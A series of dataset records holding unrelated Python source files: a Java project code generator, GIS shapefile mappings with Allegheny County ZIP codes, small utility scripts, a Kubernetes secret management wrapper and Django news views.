template_file='edit.vm',\n template_path='java_templates/web/webapp/WEB-INF/views/baseOperator',\n output_path=web_res_path + 'webapp/WEB-INF/views/' + datas[\"table_name_lowercase\"] + '/',\n output_file='edit.vm')\n cls.render(datas=datas, template_file='list.vm',\n template_path='java_templates/web/webapp/WEB-INF/views/baseOperator',\n output_path=web_res_path + 'webapp/WEB-INF/views/' + datas[\"table_name_lowercase\"] + '/',\n output_file='list.vm')\n cls.render(datas=datas, template_file='search.vm',\n 
template_path='java_templates/web/webapp/WEB-INF/views/baseOperator',\n output_path=web_res_path + 'webapp/WEB-INF/views/' + datas[\"table_name_lowercase\"] + '/',\n output_file='search.vm')\n cls.render(datas=datas, template_file='view.vm',\n template_path='java_templates/web/webapp/WEB-INF/views/baseOperator',\n output_path=web_res_path + 'webapp/WEB-INF/views/' + datas[\"table_name_lowercase\"] + '/',\n output_file='view.vm')\n print('OK - web webapp')\n\n print('BUILDING - web properties')\n shutil.copy('java_templates/web/local.properties', web_base_path + 'local.properties')\n print('OK - web properties')\n\n print('BUILDING - web pom')\n cls.render(datas=datas, template_file='pom.xml',\n template_path='java_templates/web/',\n output_path=web_base_path + '',\n output_file='pom.xml')\n print('OK - web pom')\n\n @classmethod\n def service(cls, datas):\n service_base_path = datas['output_path'] + datas['artifactId'] + '/' + datas['artifactId'] + '-service' + '/'\n service_path = service_base_path + data['common_path'] + data['package_path'] + 'service/'\n\n print('service:' + service_path)\n # interface\n print('BUILDING - service java - interface')\n cls.render(datas=datas, template_file='xxxService.java',\n template_path='java_templates/service',\n output_path=service_path,\n output_file=datas['table_name_uppercase'] + 'Service.java')\n print('OK - ' + datas['table_name_uppercase'] + 'Service.java')\n\n # impl\n print('BUILDING - service java - impl')\n cls.render(datas=datas, template_file='xxxServiceImpl.java',\n template_path='java_templates/service/impl',\n output_path=service_path + 'impl/',\n output_file=datas['table_name_uppercase'] + 'ServiceImpl.java')\n print('OK - ' + datas['table_name_uppercase'] + 'ServiceImpl.java')\n\n # base\n print('BUILDING - service base class')\n cls.render(datas=datas, template_file='BaseService.java',\n template_path='java_templates/service/base/',\n output_path=service_path + 'base/',\n output_file='BaseService.java')\n cls.render(datas=datas, template_file='BaseServiceImpl.java',\n template_path='java_templates/service/base/',\n output_path=service_path + 'base/',\n output_file='BaseServiceImpl.java')\n\n # cls.copy('java_templates/service/base', service_path+'base')\n print('OK - service base class')\n\n # pom\n print('BUILDING - service pom')\n cls.render(datas=datas, template_file='pom.xml',\n template_path='java_templates/service/',\n output_path=service_base_path,\n output_file='pom.xml')\n print('OK - service pom')\n\n @classmethod\n def dao(cls, datas):\n dao_base_path = datas['output_path'] + datas['artifactId'] + '/' + datas['artifactId'] + '-dao' + '/'\n dao_path = dao_base_path + data['common_path'] + data['package_path'] + 'dao/'\n\n dao_template_path = 'java_templates/dao/java/'\n\n print('dao:' + dao_path)\n # interface\n print('BUILDING - dao java - interface')\n cls.render(datas=datas, template_file='xxxDao.java',\n template_path=dao_template_path,\n output_path=dao_path,\n output_file=datas['table_name_uppercase'] + 'Dao.java')\n print('OK - ' + datas['table_name_uppercase'] + 'Dao.java')\n\n # impl\n print('BUILDING - dao java - impl')\n cls.render(datas=datas, template_file='xxxDaoImpl.java',\n template_path=dao_template_path + 'impl',\n output_path=dao_path + 'impl/',\n output_file=datas['table_name_uppercase'] + 'DaoImpl.java')\n print('OK - ' + datas['table_name_uppercase'] + 'DaoImpl.java')\n\n # base\n print('BUILDING - dao base class')\n cls.render(datas=datas, template_file='AppException.java',\n 
template_path=dao_template_path + 'base',\n output_path=dao_path + 'base/',\n output_file='AppException.java')\n cls.render(datas=datas, template_file='BaseDao.java',\n template_path=dao_template_path + 'base',\n output_path=dao_path + 'base/',\n output_file='BaseDao.java')\n cls.render(datas=datas, template_file='BaseDaoImpl.java',\n template_path=dao_template_path + 'base',\n output_path=dao_path + 'base/',\n output_file='BaseDaoImpl.java')\n cls.render(datas=datas, template_file='MyBatisSupport.java',\n template_path=dao_template_path + 'base',\n output_path=dao_path + 'base/',\n output_file='MyBatisSupport.java')\n\n # cls.copy(dao_template_path+'base', dao_path+'base')\n print('OK - doa base class')\n\n # resource\n print('BUILDING - dao resource - sqlmap')\n cls.render(datas=datas, template_file='xxxMapper.xml',\n template_path=dao_template_path + 'resources/sqlmap',\n output_path=dao_base_path + 'src/main/resources/sqlmap/',\n output_file=datas['table_name_uppercase'] + '.xml')\n print('OK - ' + datas['table_name_uppercase'] + '.xml')\n\n print('BUILDING - dao resource - sqlconfig')\n cls.render(datas=datas, template_file='sqlmap-config.xml',\n template_path=dao_template_path + 'resources',\n output_path=dao_base_path + 'src/main/resources/',\n output_file='sqlmap-config.xml')\n print('OK - sqlmap-config.xml')\n\n # pom\n print('BUILDING - dao pom')\n cls.render(datas=datas, template_file='pom.xml',\n template_path='java_templates/dao/',\n output_path=dao_base_path,\n output_file='pom.xml')\n print('OK - dao pom')\n\n @classmethod\n def domain(cls, datas):\n domain_base_path = datas['output_path'] + datas['artifactId'] + '/' + datas['artifactId'] + '-domain' + '/'\n domain_path = domain_base_path + data['common_path'] + data['package_path'] + 'domain/'\n\n template_path = 'java_templates/domain/'\n\n print('domain:' + domain_path)\n print('BUILDING - base domain java - DB entity')\n cls.render(datas=datas, template_file='xxx.java',\n template_path=template_path + 'java',\n output_path=domain_path,\n output_file=datas['table_name_uppercase'] + '.java')\n print('OK -' + datas['table_name_uppercase'] + '.java')\n\n print('BUILDING - request create domain - handle post request')\n cls.render(datas=datas, template_file='xxxForm.java',\n template_path=template_path + 'java/requestForm',\n output_path=domain_path + 'requestForm/',\n output_file=datas['table_name_uppercase'] + 'Form.java')\n print('OK - ' + datas['table_name_uppercase'] + 'Form.java')\n\n print('BUILDING - request query domain - handle get request')\n cls.render(datas=datas, template_file='xxxQueryForm.java',\n template_path=template_path + 'java/requestForm',\n output_path=domain_path + 'requestForm/',\n output_file=datas['table_name_uppercase'] + 'QueryForm.java')\n print('OK - ' + datas['table_name_uppercase'] + 'QueryForm.java')\n\n print('BUILDING - base domain classes')\n cls.render(datas=datas, template_file='BaseDomain.java',\n template_path=template_path + 'java/base',\n output_path=domain_path + 'base/',\n output_file='BaseDomain.java')\n cls.render(datas=datas, template_file='BaseQuery.java',\n template_path=template_path + 'java/base',\n output_path=domain_path + 'base/',\n output_file='BaseQuery.java')\n cls.render(datas=datas, template_file='Result.java',\n template_path=template_path + 'java/base',\n output_path=domain_path + 'base/',\n output_file='Result.java')\n\n cls.render(datas=datas, template_file='Message.java',\n template_path=template_path + 'java/common',\n output_path=domain_path + 'common/',\n 
output_file='Message.java')\n cls.render(datas=datas, template_file='Page.java',\n template_path=template_path + 'java/common',\n output_path=domain_path + 'common/',\n output_file='Page.java')\n print('OK - base domain classes')\n\n # pom\n print('BUILDING - domain pom')\n cls.render(datas=datas, template_file='pom.xml',\n template_path=template_path,\n output_path=domain_base_path,\n output_file='pom.xml')\n print('OK - domain pom')\n\n @classmethod\n def project(cls, datas):\n project_path = datas['output_path'] + datas['artifactId'] + '/'\n print('project: ' + project_path)\n print('BUILDING - project pom (include dependencies...)')\n cls.render(datas=datas, template_file='pom.xml',\n template_path='java_templates',\n output_path=project_path,\n output_file='pom.xml')\n print('OK - pom.xml')\n\n\nif __name__ == '__main__':\n # ------------------------------- NEW\n data = {}\n # 项目名称\n data['groupId'] = \"com.dili\"\n data['artifactId'] = \"xm-product-b2b\"\n\n # 包基础名称\n data['base_package'] = \"com.diligrp.titan\"\n data['table_name_lowercase'] = \"product\"\n data['table_name_uppercase'] = data['table_name_lowercase'].capitalize()\n data['domain'] = {'id': ('Long', u'ID', 'id'),\n 'pname': ('String', u'商品名称', 'pname'),\n 'weight': ('Long', u'商品重量', 'weight')}\n\n # 工程路径\n data['output_path'] = '/Users/yanwenyuan/Desktop/'\n data['common_path'] = 'src/main/java/'\n data['package_path'] = data['base_package'].replace('.', '/') + '/'\n\n Framework.project(data)\n Framework.web(data)\n Framework.service(data)\n Framework.domain(data)\n Framework.dao(data)\n","sub_path":"new.py","file_name":"new.py","file_ext":"py","file_size_in_byte":15924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"434103749","text":"MODEL_MAPPING = {\n \"pittsburgh_neighborhood\": {\n \"url\": \"\",\n \"source\": \"pgh_hood/Pittsburgh_Neighborhoods.shp\",\n \"model\": \"PghHood\",\n \"mapping\": {\n \"objectid\": \"objectid\",\n \"fid_blockg\": \"fid_blockg\",\n \"statefp10\": \"statefp10\",\n \"countyfp10\": \"countyfp10\",\n \"tractce10\": \"tractce10\",\n \"blkgrpce10\": \"blkgrpce10\",\n \"geoid10\": \"geoid10\",\n \"namelsad10\": \"namelsad10\",\n \"mtfcc10\": \"mtfcc10\",\n \"funcstat10\": \"funcstat10\",\n \"aland10\": \"aland10\",\n \"awater10\": \"awater10\",\n \"intptlat10\": \"intptlat10\",\n \"intptlon10\": \"intptlon10\",\n \"shape_leng\": \"shape_leng\",\n \"fid_neighb\": \"fid_neighb\",\n \"pghdbsdene\": \"pghdbsdeNe\",\n \"perimeter\": \"perimeter\",\n \"neighbor_field\": \"neighbor_\",\n \"neighbor_i\": \"neighbor_i\",\n \"hood\": \"hood\",\n \"hood_no\": \"hood_no\",\n \"acres\": \"acres\",\n \"sqmiles\": \"sqmiles\",\n \"dpwdiv\": \"dpwdiv\",\n \"unique_id\": \"unique_id\",\n \"sectors\": \"sectors\",\n \"shape_le_1\": \"shape_le_1\",\n \"shape_ar_1\": \"shape_ar_1\",\n \"page_numbe\": \"page_numbe\",\n \"plannerass\": \"plannerass\",\n \"created_us\": \"created_us\",\n \"created_da\": \"created_da\",\n \"last_edite\": \"last_edite\",\n \"last_edi_1\": \"last_edi_1\",\n \"geom\": \"MULTIPOLYGON\"\n }\n },\n \"pittsburgh_fire_zone\": {\n \"source\": \"pgh_fire_zone/fire_zone.shp\",\n \"model\": \"PghFireZone\",\n \"mapping\": {\n \"cartodb_id\": \"cartodb_id\",\n \"firezones1\": \"firezones1\",\n \"firezones_field\": \"firezones_\",\n \"mapbook\": \"mapbook\",\n \"olddist_zo\": \"olddist_zo\",\n \"dist_zone\": \"dist_zone\",\n \"shape_area\": \"shape_area\",\n \"shape_leng\": \"shape_leng\",\n \"perimeter\": \"perimeter\",\n \"area\": 
\"area\",\n \"dist\": \"dist\",\n \"geom\": \"MULTIPOLYGON\"\n }\n },\n \"pittsburgh_police_zone\": {\n \"source\": \"pgh_police/Pittsburgh_Police_Zones.shp\",\n \"model\": \"PghPoliceZone\",\n \"mapping\": {\n \"objectid\": \"objectid\",\n \"perimeter\": \"perimeter\",\n \"zone\": \"zone\",\n \"geom\": \"MULTIPOLYGON\"\n }\n },\n \"pittsburgh_ward\": {\n \"source\": \"pgh_ward/wards.shp\",\n \"model\": \"PghWard\",\n \"mapping\": {\n \"fid\": \"FID\",\n \"area\": \"AREA\",\n \"perimeter\": \"PERIMETER\",\n \"wards_field\": \"WARDS_\",\n \"wards_id\": \"WARDS_ID\",\n \"ward\": \"WARD\",\n \"acres\": \"ACRES\",\n \"sqmiles\": \"SQMILES\",\n \"unique_id\": \"UNIQUE_ID\",\n \"council\": \"COUNCIL\",\n \"dpw_insp\": \"DPW_INSP\",\n \"shape_leng\": \"Shape_Leng\",\n \"shape_area\": \"Shape_Area\",\n \"geom\": \"MULTIPOLYGON\"\n }\n },\n \"pittsburgh_city_council\": {\n \"source\": \"pgh_city_council/Pittsburgh_City_Council_Districts.shp\",\n \"model\": \"PghCityCouncil\",\n \"mapping\": {\n \"objectid_1\": \"objectid_1\",\n \"objectid\": \"objectid\",\n \"intptlat10\": \"intptlat10\",\n \"intptlon10\": \"intptlon10\",\n \"shape_leng\": \"shape_leng\",\n \"council\": \"council\",\n \"councilman\": \"councilman\",\n \"committee\": \"committee\",\n \"phone\": \"phone\",\n \"geom\": \"MULTIPOLYGON\"\n }\n },\n \"pittsburgh_dpw_division\": {\n \"source\": \"pgh_dpw_division/PGH_DPWDivisions.shp\",\n \"model\": \"PghPublicWorks\",\n \"mapping\": {\n \"objectid\": \"objectid\",\n # \"pghdbsdedp\": \"pghdbsdeDP\",\n \"perimeter\": \"perimeter\",\n \"dpwdivs_field\": \"dpwdivs_\",\n \"dpwdivs_id\": \"dpwdivs_id\",\n #\"sqmiles\": \"sqmiles\",\n #\"acres\": \"acres\",\n \"division\": \"division\",\n #\"supervsr\": \"supervsr\",\n \"unique_id\": \"unique_id\",\n #\"sq_miles\": \"sq_miles\",\n #\"dpw_divisi\": \"dpw_divisi\",\n \"geom\": \"MULTIPOLYGON\"\n }\n },\n \"allegheny_county_municipality\": {\n \"source\": \"ac_municipalities/Allegheny_County_Municipal_Boundaries.shp\",\n \"model\": \"ACMunicipality\",\n \"mapping\": {\n \"objectid\": \"OBJECTID\",\n \"muni_name\": \"NAME\",\n \"muni_type\": \"TYPE\",\n \"label\": \"LABEL\",\n \"cog\": \"COG\",\n \"schoold\": \"SCHOOLD\",\n \"congdist\": \"CONGDIST\",\n \"fips\": \"FIPS\",\n \"region\": \"REGION\",\n \"acres\": \"ACRES\",\n \"sqmi\": \"SQMI\",\n \"municode\": \"MUNICODE\",\n \"cntl_id\": \"CNTL_ID\",\n \"cntycounci\": \"CNTYCOUNCI\",\n \"eoc\": \"EOC\",\n \"assessorte\": \"ASSESSORTE\",\n \"valuationa\": \"VALUATIONA\",\n \"yearconver\": \"YEARCONVER\",\n \"globalid\": \"GlobalID\",\n \"geom\": \"MULTIPOLYGON\"\n }\n },\n \"block_group\": {\n \"source\": \"block_groups/Allegheny_County_Census_Block_Groups_2016.shp\",\n \"model\": \"BlockGroup\",\n \"mapping\": {\n \"fid\": \"FID\",\n \"state\": \"STATEFP\",\n \"county\": \"COUNTYFP\",\n \"tract\": \"TRACTCE\",\n \"block_grp\": \"BLKGRPCE\",\n \"geom\": \"MULTIPOLYGON\"\n }\n },\n \"census_tract\": {\n \"source\": \"census_tracts/Allegheny_County_Census_Tracts_2016.shp\",\n \"model\": \"CensusTract\",\n \"mapping\": {\n \"geo_id\": \"GEOID\",\n \"state\": \"STATEFP\",\n \"county\": \"COUNTYFP\",\n \"tract\": \"TRACTCE\",\n \"lsad\": \"LSAD\",\n \"geom\": \"MULTIPOLYGON\"\n }\n },\n \"census_block\": {\n \"source\": \"census_blocks/Allegheny_County_Census_Blocks_2016.shp\",\n \"model\": \"CensusBlock\",\n \"mapping\": {\n \"fid\": \"FID\",\n \"state\": \"STATEFP10\",\n \"county\": \"COUNTYFP10\",\n \"tract\": \"TRACTCE10\",\n \"block\": \"BLOCKCE10\",\n \"geom\": \"MULTIPOLYGON\"\n }\n },\n 
\"school_district\": {\n \"source\": \"school_dist/Allegheny_County_School_District_Boundaries.shp\",\n \"model\": \"SchoolDistrict\",\n \"mapping\": {\n \"object_id\": \"OBJECTID\",\n \"district_name\": \"SCHOOLD\",\n \"geom\": \"MULTIPOLYGON\"\n }\n },\n \"parcel\": {\n \"source\": \"parcels/untitled_table_24.shp\",\n \"model\": \"Parcel\",\n \"mapping\": {\n \"objectid\": \"objectid\",\n \"pin\": \"pin\",\n \"mapblocklot\": \"mapblocklo\",\n \"shapearea\": \"shapearea\",\n \"shapelen\": \"shapelen\",\n \"addr_number\": \"propertyho\",\n \"addr_fraction\": \"propertyfr\",\n \"addr_street\": \"propertyad\",\n \"addr_city\": \"propertyci\",\n \"addr_state\": \"propertyst\",\n \"addr_unit\": \"propertyun\",\n \"addr_zip\": \"propertyzi\",\n \"geom\": \"MULTIPOLYGON\"\n }\n },\n\n \"address\": {\n \"source\": \"ac_address_points/Allegheny_County_Address_Points.shp\",\n \"model\": \"AddressPoint\",\n \"mapping\": {\n \"object_id\": \"OBJECTID\",\n \"address_id\": \"ADDRESS_ID\",\n \"street_id\": \"STREET_ID\",\n \"dup_street_id\": \"DUP_STREET\",\n \"address_type\": \"ADDRESS_TY\",\n \"full_address\": \"FULL_ADDRE\",\n \"address_number_prefix\": \"ADDR_NUM_P\",\n \"address_number\": \"ADDR_NUM\",\n \"address_number_suffix\": \"ADDR_NUM_S\",\n \"street_premodifier\": \"ST_PREMODI\",\n \"street_prefix\": \"ST_PREFIX\",\n \"street_pretype\": \"ST_PRETYPE\",\n \"street_name\": \"ST_NAME\",\n \"street_type\": \"ST_TYPE\",\n \"street_postmodifier\": \"ST_POSTMOD\",\n \"unit\": \"UNIT\",\n \"unit_type\": \"UNIT_TYPE\",\n \"floor\": \"FLOOR\",\n \"municipality\": \"MUNICIPALI\",\n \"county\": \"COUNTY\",\n \"state\": \"STATE\",\n \"zip_code\": \"ZIP_CODE\",\n \"zip_code_four\": \"ZIP_CODE4\",\n \"comment\": \"COMMENT\",\n \"edit_date\": \"EDIT_DATE\",\n \"source\": \"SOURCE\",\n \"geom\": \"POINT\"\n }\n }\n}\n\nZIP_MAPPING = {\n \"15003\": {\n \"NAME\": \"AMBRIDGE\"\n },\n \"15005\": {\n \"NAME\": \"BADEN\"\n },\n \"15006\": {\n \"NAME\": \"BAIRDFORD\"\n },\n \"15007\": {\n \"NAME\": \"BAKERSTOWN\"\n },\n \"15014\": {\n \"NAME\": \"BRACKENRIDGE\"\n },\n \"15015\": {\n \"NAME\": \"BRADFORD WOODS\"\n },\n \"15017\": {\n \"NAME\": \"BRIDGEVILLE\"\n },\n \"15018\": {\n \"NAME\": \"BUENA VISTA\"\n },\n \"15020\": {\n \"NAME\": \"BUNOLA\"\n },\n \"15024\": {\n \"NAME\": \"CHESWICK\"\n },\n \"15025\": {\n \"NAME\": \"CLAIRTON\"\n },\n \"15026\": {\n \"NAME\": \"CLINTON\"\n },\n \"15028\": {\n \"NAME\": \"COULTERS\"\n },\n \"15030\": {\n \"NAME\": \"CREIGHTON\"\n },\n \"15031\": {\n \"NAME\": \"CUDDY\"\n },\n \"15034\": {\n \"NAME\": \"DRAVOSBURG\"\n },\n \"15035\": {\n \"NAME\": \"EAST MC KEESPORT\"\n },\n \"15037\": {\n \"NAME\": \"ELIZABETH\"\n },\n \"15044\": {\n \"NAME\": \"GIBSONIA\"\n },\n \"15045\": {\n \"NAME\": \"GLASSPORT\"\n },\n \"15046\": {\n \"NAME\": \"CRESCENT\"\n },\n \"15047\": {\n \"NAME\": \"GREENOCK\"\n },\n \"15049\": {\n \"NAME\": \"HARWICK\"\n },\n \"15051\": {\n \"NAME\": \"INDIANOLA\"\n },\n \"15056\": {\n \"NAME\": \"LEETSDALE\"\n },\n \"15057\": {\n \"NAME\": \"MC DONALD\"\n },\n \"15063\": {\n \"NAME\": \"MONONGAHELA\"\n },\n \"15064\": {\n \"NAME\": \"MORGAN\"\n },\n \"15065\": {\n \"NAME\": \"NATRONA HEIGHTS\"\n },\n \"15068\": {\n \"NAME\": \"NEW KENSINGTON\"\n },\n \"15071\": {\n \"NAME\": \"OAKDALE\"\n },\n \"15075\": {\n \"NAME\": \"RURAL RIDGE\"\n },\n \"15076\": {\n \"NAME\": \"RUSSELLTON\"\n },\n \"15082\": {\n \"NAME\": \"STURGEON\"\n },\n \"15083\": {\n \"NAME\": \"SUTERSVILLE\"\n },\n \"15084\": {\n \"NAME\": \"TARENTUM\"\n },\n \"15085\": {\n \"NAME\": 
\"TRAFFORD\"\n },\n \"15086\": {\n \"NAME\": \"WARRENDALE\"\n },\n \"15088\": {\n \"NAME\": \"WEST ELIZABETH\"\n },\n \"15089\": {\n \"NAME\": \"WEST NEWTON\"\n },\n \"15090\": {\n \"NAME\": \"WEXFORD\"\n },\n \"15101\": {\n \"NAME\": \"ALLISON PARK\"\n },\n \"15102\": {\n \"NAME\": \"BETHEL PARK\"\n },\n \"15104\": {\n \"NAME\": \"BRADDOCK\"\n },\n \"15106\": {\n \"NAME\": \"CARNEGIE\"\n },\n \"15108\": {\n \"NAME\": \"CORAOPOLIS\"\n },\n \"15110\": {\n \"NAME\": \"DUQUESNE\"\n },\n \"15112\": {\n \"NAME\": \"EAST PITTSBURGH\"\n },\n \"15116\": {\n \"NAME\": \"GLENSHAW\"\n },\n \"15120\": {\n \"NAME\": \"HOMESTEAD\"\n },\n \"15122\": {\n \"NAME\": \"WEST MIFFLIN\"\n },\n \"15126\": {\n \"NAME\": \"IMPERIAL\"\n },\n \"15129\": {\n \"NAME\": \"SOUTH PARK\"\n },\n \"15131\": {\n \"NAME\": \"MCKEESPORT\"\n },\n \"15132\": {\n \"NAME\": \"MCKEESPORT\"\n },\n \"15133\": {\n \"NAME\": \"MCKEESPORT\"\n },\n \"15135\": {\n \"NAME\": \"MCKEESPORT\"\n },\n \"15136\": {\n \"NAME\": \"MC KEES ROCKS\"\n },\n \"15137\": {\n \"NAME\": \"NORTH VERSAILLES\"\n },\n \"15139\": {\n \"NAME\": \"OAKMONT\"\n },\n \"15140\": {\n \"NAME\": \"PITCAIRN\"\n },\n \"15142\": {\n \"NAME\": \"PRESTO\"\n },\n \"15143\": {\n \"NAME\": \"SEWICKLEY\"\n },\n \"15144\": {\n \"NAME\": \"SPRINGDALE\"\n },\n \"15145\": {\n \"NAME\": \"TURTLE CREEK\"\n },\n \"15146\": {\n \"NAME\": \"MONROEVILLE\"\n },\n \"15147\": {\n \"NAME\": \"VERONA\"\n },\n \"15148\": {\n \"NAME\": \"WILMERDING\"\n },\n \"15201\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15202\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15203\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15204\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15205\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15206\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15207\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15208\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15209\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15210\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15211\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15212\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15213\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15214\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15215\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15216\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15217\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15218\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15219\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15220\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15221\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15222\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15223\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15224\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15225\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15226\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15227\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15228\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15229\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15232\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15233\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15234\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15235\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15236\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15237\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15238\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15239\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15241\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15243\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15261\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15275\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15276\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15282\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15290\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15321\": 
{\n \"NAME\": \"CECIL\"\n },\n \"15332\": {\n \"NAME\": \"FINLEYVILLE\"\n },\n \"15642\": {\n \"NAME\": \"IRWIN\"\n },\n \"15668\": {\n \"NAME\": \"MURRYSVILLE\"\n },\n \"16046\": {\n \"NAME\": \"MARS\"\n },\n \"16055\": {\n \"NAME\": \"SARVER\"\n },\n \"16056\": {\n \"NAME\": \"SAXONBURG\"\n },\n \"16059\": {\n \"NAME\": \"VALENCIA\"\n },\n \"16229\": {\n \"NAME\": \"FREEPORT\"\n }\n}\n","sub_path":"data_collection/collection_settings.py","file_name":"collection_settings.py","file_ext":"py","file_size_in_byte":14495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"553782225","text":"largura = int(input(\"Digite a largura: \"))\naltura = int(input(\"Digite a altura: \"))\n\ndef Quadrado(altura, largura, simbolo = '#', preenchimento = ' '):\n print(simbolo * largura)\n for _ in range(altura-2):\n print('{}{}{}'.format(simbolo, preenchimento * (largura - 2), simbolo))\n print(simbolo * largura)\n\nQuadrado(altura, largura)\n","sub_path":"imprime_retangulo_vazado.py","file_name":"imprime_retangulo_vazado.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"631113348","text":"\n# coding: utf-8\n\n# In[1]:\n\n\n\nfrom bs4 import BeautifulSoup\nimport requests\nimport webbrowser\n\ndef openff():\n # This def open firefox browser.\n Jpsen = input(\"英語にしたい日本語を入力してください: \")\n url = \"https://script.google.com/macros/s/AKfycby_dU9RymFwgEsd6txZAhA68MQAnUQxXeRnbVia_V0U8fv-Gkoy/exec?text=\" + Jpsen + \"&source=ja&target=en\"\n browser = webbrowser.get('chrome')\n browser.open(url)\n\n r = r = requests.get(url)\n soup = BeautifulSoup(r.content, \"html.parser\")\n soup.find_all\n\nopenff()\n\n","sub_path":"JP_EN.py","file_name":"JP_EN.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"631263569","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 14 10:27:34 2017\n@author: Thautwarm\n\"\"\"\nfrom .config.classDefine import class_info,class_type_map\nfrom copy import deepcopy\ndef giveType(keyname):\n for type_map_key in class_type_map:\n for sign in class_type_map[type_map_key]:\n if sign in keyname.lower() :\n return type_map_key\n return \"varchar(255)\"\n\nclass makeEntity:\n def __init__(self,init,name=None):\n if name:\n self.table=name\n if type(init) in [tuple,list]: #定义一个Entity\n self.typemap=dict()\n for i in init:\n self.__setattr__(i,None)\n self.typemap[i]=giveType(i)\n self.attrs=set(init)\n elif type(init)==dict: #集成所有Entity\n for i in init:\n self.__setattr__(i,init[i])\n self.attrs=set(init)\n def toMap(self):\n maps=dict()\n for attr in self.attrs:\n value=self[attr]\n if value:\n maps[attr]=value\n return maps\n def __call__(self,**attrValues):\n if attrValues:\n ret=deepcopy(self)\n ret.__init__(attrValues)\n return ret\n \n return deepcopy(self)\n def get(self,key):\n return self.__getattribute__(key)\n def set(self,key,value):\n if key in self.attrs:\n self.__setattr__(key,value)\n def __getitem__(self,key):\n return self.__getattribute__(key)\n \nentities=makeEntity( dict( \n [ (config_i['class'], makeEntity(config_i['attrs'],name=config_i['class'])) for config_i in class_info ]\n ) )\n \n \n \n \n ","sub_path":"entity.py","file_name":"entity.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"298983514","text":"# coding: 
utf-8\n\nimport json\nfrom pprint import pprint\nfrom kubernetes import client, config\n\nimport apis.t3q_secret as t3q_secret\n\ndef create(Resource):\n if Resource['type'] == 'docker':\n fn = t3q_secret.create_docker_secret\n else:\n fn = t3q_secret.create_git_secret\n fn(\n Resource['name'],\n Resource['site'],\n Resource['user'],\n Resource['passwd'])\n\ndef delete(Resource):\n t3q_secret.delete_secret(Resource['name'])\n\ndef list():\n secrets = t3q_secret.list_secret()\n res = []\n for s in secrets.items:\n anno = s.metadata.annotations\n site = []\n for key in anno:\n site.append({'name':key, 'value':anno[key]})\n res.append({\n 'name': s.metadata.name,\n 'site': site,\n 'type': s.type,\n })\n return res\n","sub_path":"dashboard/t3q_dash_secret.py","file_name":"t3q_dash_secret.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"206092655","text":"from django.conf import settings\nfrom django.contrib.auth import get_user_model\nfrom django.core.paginator import Paginator\nfrom django.shortcuts import render, get_object_or_404\n\nfrom .models import News, Tag, Ip\n\nUser = get_user_model()\n\n\ndef get_client_ip(request):\n x_forwarded_for = request.META.get('HTTP_X_FORWARDED_FOR')\n if x_forwarded_for:\n ip = x_forwarded_for.split(',')[0]\n else:\n ip = request.META.get('REMOTE_ADDR')\n return ip\n\n\ndef index(request):\n news_list = News.objects.all()\n paginator = Paginator(news_list, settings.PAGE_SIZE)\n page_number = request.GET.get('page')\n page = paginator.get_page(page_number)\n context = {\n 'page': page,\n }\n return render(request, 'news/index.html', context)\n\n\ndef news_view(request, item_id):\n item = get_object_or_404(News, pk=item_id)\n ip = get_client_ip(request)\n if Ip.objects.filter(ip=ip).exists():\n item.views.add(Ip.objects.get(ip=ip))\n else:\n Ip.objects.create(ip=ip)\n item.views.add(Ip.objects.get(ip=ip))\n context = {\n 'item': item,\n }\n return render(request, 'news/news.html', 